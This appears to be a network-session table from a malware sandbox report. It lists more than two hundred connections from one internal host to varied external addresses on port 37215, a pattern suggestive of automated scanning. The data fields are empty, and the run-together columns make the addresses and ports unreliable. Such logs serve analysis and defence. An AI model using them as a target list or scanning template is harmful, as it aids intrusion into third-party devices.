                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15012192.168.2.135960841.218.119.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15013192.168.2.1335636157.151.254.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15014192.168.2.1346170157.165.7.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15015192.168.2.1346412157.231.120.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15016192.168.2.135915841.252.100.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15017192.168.2.1335104197.35.95.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15018192.168.2.136025841.57.246.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15019192.168.2.1358504197.29.97.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15020192.168.2.136014441.78.40.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15021192.168.2.1359406197.139.37.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15022192.168.2.1347740157.87.183.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15023192.168.2.1343186157.125.174.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15024192.168.2.1351548157.229.234.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15025192.168.2.133986475.77.19.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15026192.168.2.134675041.183.248.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15027192.168.2.1345354157.14.140.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15028192.168.2.1337164157.17.8.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15029192.168.2.133385258.15.223.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15030192.168.2.1350798157.218.68.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15031192.168.2.1360818157.195.88.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15032192.168.2.1360576147.218.32.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15033192.168.2.135920241.234.190.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15034192.168.2.133446041.152.99.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15035192.168.2.134916841.38.152.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15036192.168.2.135579641.142.206.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15037192.168.2.1341202197.88.36.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15038192.168.2.1337734197.146.32.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15039192.168.2.1350102130.85.251.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15040192.168.2.134867041.216.213.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15041192.168.2.1342104121.241.147.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15042192.168.2.135472441.116.155.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15043192.168.2.1346530197.23.35.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15044192.168.2.1337260199.211.156.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15045192.168.2.1345048197.209.102.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15046192.168.2.1349356197.52.13.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15047192.168.2.1352156157.184.185.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15048192.168.2.1341282157.208.91.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15049192.168.2.1360434197.154.158.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15050192.168.2.1346100138.16.5.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15051192.168.2.135584041.148.242.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15052192.168.2.135520441.108.142.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15053192.168.2.1339954148.118.211.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15054192.168.2.1353226197.252.229.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15055192.168.2.1360828197.232.47.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15056192.168.2.133980463.89.116.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15057192.168.2.1357434197.129.142.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15058192.168.2.135787241.214.176.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15059192.168.2.133885441.143.55.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15060192.168.2.1337564197.124.246.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15061192.168.2.1345904157.115.169.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15062192.168.2.1359356169.120.9.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15063192.168.2.136097841.209.30.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15064192.168.2.134324641.70.128.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15065192.168.2.1337110157.179.237.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15066192.168.2.1339450120.89.215.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15067192.168.2.135074859.110.238.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15068192.168.2.135240641.253.179.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15069192.168.2.133906087.120.158.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15070192.168.2.1334608157.36.24.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15071192.168.2.1341824157.199.146.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15072192.168.2.1347378197.206.217.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15073192.168.2.134734241.111.136.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15074192.168.2.133515825.195.188.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15075192.168.2.1347790197.98.31.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15076192.168.2.1341336157.34.217.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15077192.168.2.1352318157.83.37.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15078192.168.2.1352092157.194.100.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15079192.168.2.133497641.83.148.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15080192.168.2.1345434157.173.79.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15081192.168.2.1336502157.130.119.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15082192.168.2.1352866169.7.180.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15083192.168.2.1358926197.108.99.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15084192.168.2.1341084157.51.80.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15085192.168.2.133955054.104.179.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15086192.168.2.1341764157.241.59.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15087192.168.2.1337178157.16.88.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15088192.168.2.1353354157.210.110.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15089192.168.2.133412866.148.239.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15090192.168.2.133943664.43.54.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15091192.168.2.135456441.247.149.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15092192.168.2.1349254157.175.240.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15093192.168.2.1340386172.150.211.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15094192.168.2.1358172157.139.155.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15095192.168.2.135850841.21.251.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15096192.168.2.1353626157.38.190.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15097192.168.2.1334554197.150.73.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15098192.168.2.1347700222.145.97.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15099192.168.2.135535687.71.188.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15100192.168.2.135005038.177.155.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15101192.168.2.135852641.75.161.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15102192.168.2.1354398197.9.89.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15103192.168.2.1352654197.55.199.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15104192.168.2.1360608197.34.241.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15105192.168.2.135351241.133.82.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15106192.168.2.1341866197.199.38.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15107192.168.2.1338096197.68.248.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15108192.168.2.1335470157.163.91.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15109192.168.2.1356890119.184.64.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15110192.168.2.1339410197.102.249.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15111192.168.2.133349041.21.33.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15112192.168.2.134919041.73.209.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15113192.168.2.135137041.220.141.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15114192.168.2.1340226157.116.247.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15115192.168.2.135138641.155.193.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15116192.168.2.1342290185.255.210.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15117192.168.2.1333700157.246.149.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15118192.168.2.1360822157.241.182.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15119192.168.2.1347646157.27.30.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15120192.168.2.133895075.165.3.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15121192.168.2.1345722185.229.167.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15122192.168.2.134513485.240.87.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15123192.168.2.1351872197.140.196.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15124192.168.2.1348752157.230.219.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15125192.168.2.1357628187.244.75.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15126192.168.2.1351792220.177.164.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15127192.168.2.1335528205.177.186.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15128192.168.2.134947241.159.17.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15129192.168.2.134548041.44.97.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15130192.168.2.1332960197.63.170.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15131192.168.2.136049814.246.216.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15132192.168.2.133880441.45.149.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15133192.168.2.1359114133.247.23.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15134192.168.2.133722441.207.124.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15135192.168.2.135735682.47.43.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15136192.168.2.135272841.10.226.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15137192.168.2.1336498106.171.94.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15138192.168.2.133644041.58.46.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15139192.168.2.1360828197.46.27.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15140192.168.2.133441841.122.86.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15141192.168.2.1360288157.133.125.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15142192.168.2.134314441.230.90.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15143192.168.2.134766241.206.111.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15144192.168.2.135963246.34.120.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15145192.168.2.135646841.128.184.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15146192.168.2.1341676157.162.71.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15147192.168.2.135004012.128.6.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15148192.168.2.1349564157.154.173.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15149192.168.2.1335354197.152.14.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15150192.168.2.1341086197.107.87.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15151192.168.2.1343292197.153.198.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15152192.168.2.135229841.82.36.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15153192.168.2.1351842191.249.192.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15154192.168.2.1354786136.100.9.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15155192.168.2.1335698157.93.95.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15156192.168.2.134863814.147.153.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15157192.168.2.1336728197.113.240.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15158192.168.2.1336696157.253.125.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15159192.168.2.1360822157.207.116.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15160192.168.2.1341698157.190.45.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15161192.168.2.134979441.67.101.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15162192.168.2.1360628157.223.254.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15163192.168.2.135865041.179.34.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15164192.168.2.134373641.197.59.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15165192.168.2.1358836207.85.61.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15166192.168.2.1359766157.249.224.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15167192.168.2.1356360157.254.164.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15168192.168.2.1359698197.143.108.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15169192.168.2.1342564197.61.65.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15170192.168.2.133528441.33.163.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15171192.168.2.1350894157.55.5.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15172192.168.2.1334822108.180.100.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15173192.168.2.135416641.72.65.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15174192.168.2.133932441.44.208.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15175192.168.2.135241441.126.250.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15176192.168.2.134294841.77.4.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15177192.168.2.1341384157.182.28.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15178192.168.2.135116241.163.211.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15179192.168.2.1340028197.123.214.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15180192.168.2.1340368197.155.117.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15181192.168.2.133610241.33.38.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15182192.168.2.1334260197.245.213.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15183192.168.2.1352338157.65.61.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15184192.168.2.135052241.86.79.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15185192.168.2.1358782157.66.210.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15186192.168.2.1342226197.161.151.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15187192.168.2.1349480197.95.8.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15188192.168.2.135199259.50.32.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15189192.168.2.1347444157.221.113.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15190192.168.2.1354250157.139.27.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15191192.168.2.135516441.130.44.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15192192.168.2.1334238192.195.191.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15193192.168.2.135279841.112.187.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15194192.168.2.134875041.10.32.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15195192.168.2.133677241.211.209.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15196192.168.2.135501641.86.119.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15197192.168.2.133953641.171.66.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15198192.168.2.1353904110.247.133.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15199192.168.2.1346394197.66.10.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15200192.168.2.1350914197.142.105.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15201192.168.2.1340110197.5.72.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15202192.168.2.133985078.230.247.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15203192.168.2.1340188197.52.160.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15204192.168.2.13384408.247.233.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15205192.168.2.1344740197.175.108.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15206192.168.2.133915041.82.235.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15207192.168.2.1348576157.106.201.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15208192.168.2.1337062197.69.130.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15209192.168.2.1345524157.114.172.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15210192.168.2.1335618157.246.54.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15211192.168.2.135393841.133.99.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15212192.168.2.135372079.31.126.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15213192.168.2.1340656157.65.18.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15214192.168.2.135530041.182.197.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15215192.168.2.1342012157.191.246.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15216192.168.2.1358422157.4.92.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15217192.168.2.134904842.164.150.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15218192.168.2.135510241.23.149.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15219192.168.2.1353264164.137.84.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15220192.168.2.133778041.45.189.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
